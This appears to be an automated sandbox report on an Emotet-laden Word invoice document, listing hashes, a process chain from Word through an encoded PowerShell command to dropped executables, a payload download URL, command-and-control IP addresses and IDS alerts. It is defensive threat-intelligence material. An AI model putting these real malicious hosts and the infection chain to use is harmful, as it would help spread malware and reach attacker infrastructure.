Field | Value |
---|---|
File name: | Factura_D99968300.doc |
Full analysis: | https://app.any.run/tasks/4ba8ed14-f290-4d1b-907c-c205672d1899 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims, but even private users get infected in mass spam email campaigns. |
Analysis date: | April 25, 2019, 19:13:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Apr 25 13:01:00 2019, Last Saved Time/Date: Thu Apr 25 13:01:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0 |
MD5: | 9E28085A88D8FB9CE26A3F6ECD2517E8 |
SHA1: | 987FB5D61A75DA32AF51047433CD444A8088E1D4 |
SHA256: | EB2AEA582CF5C277A3F3AE1CE7C8EB3FF0CC6DDCD5676913CC7EAE2E96F1B622 |
SSDEEP: | 6144:b77HUUUUUUUUUUUUUUUUUUUT52VjSy0h0ZB71y:b77HUUUUUUUUUUUUUUUUUUUTCeyKaB78 |
Extension | Detected type |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
Title: | - |
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:04:25 12:01:00 |
ModifyDate: | 2019:04:25 12:01:00 |
Pages: | 1 |
Words: | - |
Characters: | 5 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 5 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
4012 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Factura_D99968300.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | | |
2060 | powershell -e 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | WmiPrvSE.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
3288 | "C:\Users\admin\38.exe" | C:\Users\admin\38.exe | — | powershell.exe |
User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
1704 | --f33b820f | C:\Users\admin\38.exe | | 38.exe |
User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
3380 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | | 38.exe |
User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
1096 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | | soundser.exe |
User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
1404 | "C:\Users\admin\AppData\Local\soundser\XluNc.exe" | C:\Users\admin\AppData\Local\soundser\XluNc.exe | — | soundser.exe |
User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
572 | --19fda0d7 | C:\Users\admin\AppData\Local\soundser\XluNc.exe | | XluNc.exe |
User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
1000 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | | XluNc.exe |
User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
1928 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | | soundser.exe |
User: admin; Integrity Level: MEDIUM | | | | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
4012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6434.tmp.cvr | — | — | — |
2060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MPUDE3UTFU5YBQ4KDU6E.temp | — | — | — |
2060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
572 | XluNc.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | C269F0952FD0EE6C8AAA2C895B51F1CE | C5A51343901F1FA017AA35CA81D3D3894513377FE3FC3637EAEF90159BCAF384 |
2060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe724d.TMP | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
2060 | powershell.exe | C:\Users\admin\38.exe | executable | 3F5A7865E0EE668A2BFFCA64CBF127CD | 9C38B0B64EB091EB10521EE5A602940020AFA164615CC93898E771DFF24C97CE |
4012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 825C45DD10C96600B19CB23B108C989D | 7C821062FDC859ADBA6F62E919301188567AB7912FBA2458B8EC3C72FE0F88DB |
1704 | 38.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | 3F5A7865E0EE668A2BFFCA64CBF127CD | 9C38B0B64EB091EB10521EE5A602940020AFA164615CC93898E771DFF24C97CE |
1096 | soundser.exe | C:\Users\admin\AppData\Local\soundser\XluNc.exe | executable | C269F0952FD0EE6C8AAA2C895B51F1CE | C5A51343901F1FA017AA35CA81D3D3894513377FE3FC3637EAEF90159BCAF384 |
4012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 59632E735966334D40089A8F9343C66B | F74A2105F795B882F9F2E3CDDFD3EF711F30FE38A777A3E6607CE296920D63EF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1928 | soundser.exe | GET | — | 31.172.86.183:8080 | http://31.172.86.183:8080/whoami.php | DE | — | — | malicious |
2060 | powershell.exe | GET | 200 | 165.227.97.68:80 | http://dukkank.com/wp-admin/Uh4/ | US | executable | 134 Kb | suspicious |
1928 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/srvc/jit/ | CA | binary | 148 b | malicious |
1928 | soundser.exe | POST | — | 31.172.86.183:8080 | http://31.172.86.183:8080/attrib/xian/ringin/merge/ | DE | — | — | malicious |
1096 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/chunk/glitch/ringin/ | CA | binary | 67.6 Kb | malicious |
1928 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/pnp/ | CA | binary | 705 Kb | malicious |
1928 | soundser.exe | GET | 200 | 104.236.185.25:8080 | http://104.236.185.25:8080/whoami.php | US | text | 13 b | malicious |
1928 | soundser.exe | POST | 200 | 104.236.185.25:8080 | http://104.236.185.25:8080/entries/xian/ringin/merge/ | US | binary | 3.29 Kb | malicious |
1928 | soundser.exe | POST | 200 | 104.236.185.25:8080 | http://104.236.185.25:8080/forced/cookies/ringin/ | US | binary | 3.13 Kb | malicious |
1928 | soundser.exe | POST | 200 | 104.236.185.25:8080 | http://104.236.185.25:8080/free/ | US | binary | 3.07 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1928 | soundser.exe | 31.172.86.183:8080 | — | First Colo GmbH | DE | malicious |
1928 | soundser.exe | 24.150.44.53:80 | — | Cogeco Cable | CA | malicious |
2060 | powershell.exe | 165.227.97.68:80 | dukkank.com | Digital Ocean, Inc. | US | suspicious |
1928 | soundser.exe | 64.136.44.45:465 | smtp.juno.com | Netzero,INC. | US | unknown |
1928 | soundser.exe | 104.236.185.25:8080 | — | Digital Ocean, Inc. | US | malicious |
1928 | soundser.exe | 191.252.112.195:587 | smtp.mbseventos.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
1928 | soundser.exe | 208.84.244.139:25 | pop.jnd.terra.com.br | Terra Networks Operations Inc. | US | unknown |
1096 | soundser.exe | 24.150.44.53:80 | — | Cogeco Cable | CA | malicious |
1928 | soundser.exe | 207.210.229.92:25 | jadisa.com.mx | Colo4, LLC | US | unknown |
1928 | soundser.exe | 207.210.229.92:465 | jadisa.com.mx | Colo4, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
dukkank.com | | suspicious |
pop.jnd.terra.com.br | | unknown |
jadisa.com.mx | | unknown |
smtp.mbseventos.com.br | | unknown |
mail.jnd.terra.com.br | | unknown |
smtpout.secureserver.net | | whitelisted |
smtp.juno.com | | shared |
smtp.gmail.com | | shared |
smtp.mail.yahoo.com | | shared |
serv2.hostingweb-mx.net | | unknown |
PID | Process | Class | Message |
---|---|---|---|
2060 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2060 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2060 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1096 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 17 |
1096 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1928 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1928 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1928 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1928 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1928 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |